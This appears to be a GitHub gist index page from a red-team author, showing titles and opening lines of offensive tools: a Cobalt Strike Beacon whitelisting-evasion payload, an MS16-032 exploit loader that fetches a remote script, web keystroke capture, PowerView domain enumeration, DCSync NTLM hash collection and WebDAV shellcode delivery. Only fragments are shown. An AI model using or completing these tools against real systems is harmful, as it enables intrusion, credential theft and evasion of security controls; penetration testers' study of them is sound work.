vysecurity
/ beaconPayload.cs
Created
January 28, 2016 13:41
Application Whitelisting Evasion for Cobalt Strike - Beacon Payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //Add For PowerShell Invocation | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; |
vysecurity
/ ms16-032.cna
Created
September 28, 2016 23:21
— forked from rsmudge/ms16-032.cna
Quick and dirty script to integrate ms16-032 into Cobalt Strike and its workflows.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon | |
| # | |
| # 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later) | |
| # 1. grab MS16-032.ps1 | |
| # https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1 | |
| # 2. store it with this script | |
| # 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack | |
| # logic to run this particular attack | |
| sub exploit { |
vysecurity
/ webkeystrokes.cna
Created
September 28, 2016 23:21
— forked from rsmudge/webkeystrokes.cna
Shows how to pull keystrokes captured by website clone tool from Cobalt Strike's data model. Go to View -> Script Console. Type: load /path/to/webkeystrokes.cna. Then type 'pull'. This will present the information to you.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # convert comma separated keystroke values into a string. | |
| sub toString { | |
| local('@temp'); | |
| @temp = split(",", $1); | |
| shift(@temp); | |
| return join("", map({ | |
| return chr(parseNumber($1, 16, 10)); | |
| }, @temp)); | |
| } |
vysecurity
/ getpidany.cna
Created
September 28, 2016 23:22
— forked from rsmudge/getpidany.cna
Get PID of Any Process
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # getexplorerpid($bid, &callback); | |
| sub getanypid { | |
| bps($1, lambda({ | |
| local('$pid $name $entry'); | |
| foreach $entry (split("\n", $2)) { | |
| ($name, $pid) = split("\\s+", $entry); | |
| if ($name eq $proc) { | |
| # $1 is our Beacon ID, $pid is the PID of $proc | |
| [$callback: $1, $proc, $pid]; | |
| } |
vysecurity
/ gist:702a165b23b2a290859e179bad3f4a18
Created
May 27, 2017 03:02
— forked from pcting/gist:1041387
SSH Tunnel UDP Packets from REMOTE server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # YOUR LOCAL BOX | |
| socat -t0 -T0 tcp4-listen:6667,reuseaddr,fork UDP:localhost:4445 | |
| ssh user@remote_server -R 6667:localhost:6667 | |
| # REMOTE MACHINE | |
| socat -t0 -T0 udp4-recvfrom:4445,reuseaddr,fork tcp:localhost:6667 |
vysecurity
/ PowerView-2.0-tricks.ps1
Created
June 17, 2017 22:19
— forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # get all the groups a user is effectively a member of, 'recursing up' | |
| Get-NetGroup -UserName <USER> | |
| # get all the effective members of a group, 'recursing down' | |
| Get-NetGroupMember -GoupName <GROUP> -Recurse | |
| # get the effective set of users who can administer a server | |
| Get-NetLocalGroup -Recurse SERVER.domain.local | |
| # retrieve all the computers a GPP password applies to |
vysecurity
/ PowerView-3.0-tricks.ps1
Created
June 18, 2017 08:48
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set | |
| # Add : add a new object to a destination | |
| # Set : modify a given object | |
| # Invoke : lazy catch-all |
vysecurity
/ Invoke-DCSync.ps1
Created
August 15, 2017 20:45
— forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-DCSync | |
| { | |
| <# | |
| .SYNOPSIS | |
| Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
| Author: @monoxgas | |
| Improved by: @harmj0y |
vysecurity
/ Invoke-WebDavDelivery.ps1
Created
September 11, 2017 14:19
Payload delivery using WebDAV PROPFIND only covert channel
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-WebDavDelivery | |
| { | |
| <# | |
| .SYNOPSIS | |
| Receive a shellcode over WebDav PROPFIND channel, then load it into memory and execute it. | |
| This script requires its server side counterpart (webdavdelivery.py) to communicate with and actually deliver the payload data. | |
| Function: Invoke-WebDavDelivery | |
| Author: Arno0x0x, Twitter: @Arno0x0x |
OlderNewer